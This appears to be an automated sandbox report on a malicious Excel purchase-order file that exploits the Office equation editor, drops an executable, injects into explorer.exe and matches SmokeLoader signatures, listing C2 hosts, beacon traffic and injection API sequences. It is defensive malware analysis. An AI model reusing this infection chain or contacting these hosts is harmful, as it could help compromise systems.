c8 6e 80 75 c4 f9 f8 14 93 c2 26 2c ef 10 85 ba 8a 5f ba fa 87 75 f3 49 93 d6 6a 3e dc 9e 4e 73 00 d0 a4 58 e7 6c e3 ae 1e c0 cd 32 eb 6f 1e 3c 21 21 06 55 2d 17 eb 81 40 dc 24 52 9a e8 f8 45 56 53 0f 5e f5 49 d4 01 33 16 7e 39 b9 8c f0 40 ee 9f ed c9 a6 18 35 56 49 18 dd 6a 17 18 ca 8a ef f7 c3 37 57 64 6b 0b 46 a6 81 35 bd 62 ed e1 b7 84
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 May 2023 10:57:57 GMTServer: Apache/2.4.56 (Debian)Content-Length: 401Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 64 72 6f 70 62 75 79 69 6e 63 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at dropbuyinc.ga Port 80</address></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.250

Source: EQNEDT32.EXE, 00000002.00000002.973874573.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comD equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EQNEDT32.EXE, 00000002.00000002.973874573.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gekbvbme.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: dropbuyinc.ga

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0000001A.00000002.1194343464.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1194283601.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: 00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1061965505.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1147182548.00000000002A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1146958938.0000000000280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1061965505.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000015.00000002.1147182548.00000000002A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000015.00000002.1146958938.0000000000280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 8	Screenshot OCR: document is protected 11 ~ I" 12 13 14 15 rw d him 16 , G) Open the documen: in NthrS Oocu
Source: Screenshot number: 12	Screenshot OCR: document is protected 11 I'-' 12 GmpQwy 13 :1' 14 15 16 hw6d Open the documen: in thrS Oocumer
Source: Screenshot number: 16	Screenshot OCR: document is protected 1-: 12 GmpQwy 13 :1' 14 15 16 hw6d G) Open the documen: in NthrS Oocum
Source: Document image extraction number: 1	Screenshot OCR: document is protected Open the cSCKumcn: In Mkrosoft OfEKe 1 PYrncmng onlne rS rXX avavlabk fOr
Source: Screenshot number: 24	Screenshot OCR: document is protected t Z ~~ a Open the cSoCumen: In If INS was Once you hNre embkd " Mkrosof

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Windows\explorer.exe	Code function: 9_2_028C281C	9_2_028C281C
Source: C:\Windows\explorer.exe	Code function: 9_2_0293281C	9_2_0293281C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C2308	18_2_000C2308
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000CC107	18_2_000CC107
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000DB16A	18_2_000DB16A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00114246	18_2_00114246
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000DB78C	18_2_000DB78C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C6C78	18_2_000C6C78
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000E5D16	18_2_000E5D16
Source: C:\Windows\explorer.exe	Code function: 20_2_00061E20	20_2_00061E20

Source: B22F.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 6e855c85de07bc6a.automaticDestinations-ms.9.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 1b4dd67f29cb1962.automaticDestinations-ms.9.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\explorer.exe

Section loaded: mlang.dll

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rirjijj	Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rirjijj	Memory allocated: 77740000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rirjijj	Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rirjijj	Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 77740000 page execute and read and write

Source: 00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1061965505.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000015.00000002.1147182548.00000000002A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000015.00000002.1146958938.0000000000280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 000C860F appears 40 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 000C7D7E appears 33 times

Source: C:\Users\Public\vbc.exe	Code function: 5_2_0FA328AB NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,	5_2_0FA328AB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F2CA6 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	5_2_001F2CA6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F2C34 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	5_2_001F2C34
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F2CA3 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	5_2_001F2CA3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F231B NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	5_2_001F231B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004015EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030E0 Sleep,GetModuleFileNameW,MapViewOfFile,LocalAlloc,GetWindowThreadProcessId,NtOpenProcess,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,RtlCreateUserThread,wcsstr,towlower,	6_2_004030E0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004015F6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015F6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040158A NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_0040158A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401600 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401600
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401607 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401607
Source: C:\Windows\explorer.exe	Code function: 9_2_029346A8 NtCreateSection,	9_2_029346A8
Source: C:\Windows\explorer.exe	Code function: 9_2_02933044 NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,	9_2_02933044
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00312CA6 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	15_2_00312CA6
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00312C34 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	15_2_00312C34
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00312CA3 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	15_2_00312CA3
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_0031231B NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	15_2_0031231B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C49A0 RtlMoveMemory,NtUnmapViewOfSection,	18_2_000C49A0
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00252CA6 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	19_2_00252CA6
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00252C34 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	19_2_00252C34
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00252CA3 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	19_2_00252CA3
Source: C:\Users\Public\vbc.exe	Code function: 19_2_0025231B NtCreateSection,NtMapViewOfSection,CreateProcessW,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,	19_2_0025231B
Source: C:\Windows\explorer.exe	Code function: 20_2_000638B0 NtUnmapViewOfSection,	20_2_000638B0
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 21_2_004015EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	21_2_004015EB
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 21_2_004030E0 Sleep,GetModuleFileNameW,MapViewOfFile,LocalAlloc,GetWindowThreadProcessId,NtOpenProcess,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,RtlCreateUserThread,wcsstr,	21_2_004030E0
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 21_2_004015F6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	21_2_004015F6
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 21_2_0040158A NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	21_2_0040158A
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 21_2_00401600 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	21_2_00401600
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 21_2_00401607 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	21_2_00401607

Source: vbc[1].exe.2.dr	Static PE information: Resource name: ECMQW type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: vbc[1].exe.2.dr	Static PE information: Resource name: ECMQW type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: vbc.exe.2.dr	Static PE information: Resource name: ECMQW type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: vbc.exe.2.dr	Static PE information: Resource name: ECMQW type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: rirjijj.9.dr	Static PE information: Resource name: ECMQW type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: rirjijj.9.dr	Static PE information: Resource name: ECMQW type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: PO-112030087.xls

OLE indicator, VBA macros: true

Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rirjijj.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rirjijj	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: PO-112030087.LNK.0.dr	LNK file: ..\..\..\..\..\Desktop\PO-112030087.xls
Source: PO-112030087.lnk.9.dr	LNK file: ..\..\..\..\..\Desktop\PO-112030087.xls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLS@52/56@6/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: PO-112030087.xls

OLE indicator, Workbook stream: true

Source: explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: .VBPud<_
Source: EQNEDT32.EXE, 00000002.00000003.973305510.0000000000623000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmp, vbc.exe, 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmp, rirjijj, 0000000F.00000002.1135086870.000000000FA9D000.00000002.00000001.01000000.00000007.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.1127096692.000000000FA9D000.00000002.00000001.01000000.00000005.sdmp, rirjijj, 00000015.00000002.1147523650.000000000FA9D000.00000002.00000001.01000000.00000007.sdmp, vbc.exe, 00000017.00000000.1133696646.000000000FA9D000.00000002.00000001.01000000.00000005.sdmp, vbc.exe.2.dr	Binary or memory string: (*\Ad:\sources\vb98\vbapps\wizards\dataform\dataform.vbp
Source: vbc.exe, 00000005.00000000.972728021.000000000FA8B000.00000002.00000001.01000000.00000005.sdmp, vbc.exe, 00000006.00000000.977245319.000000000FA8B000.00000002.00000001.01000000.00000005.sdmp, rirjijj, 0000000F.00000000.1118033614.000000000FA8B000.00000002.00000001.01000000.00000007.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004DD9000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.1127096692.000000000FA8B000.00000002.00000001.01000000.00000005.sdmp, rirjijj, 00000015.00000000.1130659746.000000000FA8B000.00000002.00000001.01000000.00000007.sdmp, vbc.exe, 00000017.00000002.1195292616.000000000FA8B000.00000002.00000001.01000000.00000005.sdmp, vbc.exe.2.dr	Binary or memory string: ( (*\Ad:\sources\vb98\vbapps\wizards\dataform\dfwizen.vbp,

Source: PO-112030087.xls	ReversingLabs: Detection: 37%
Source: PO-112030087.xls	Virustotal: Detection: 50%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
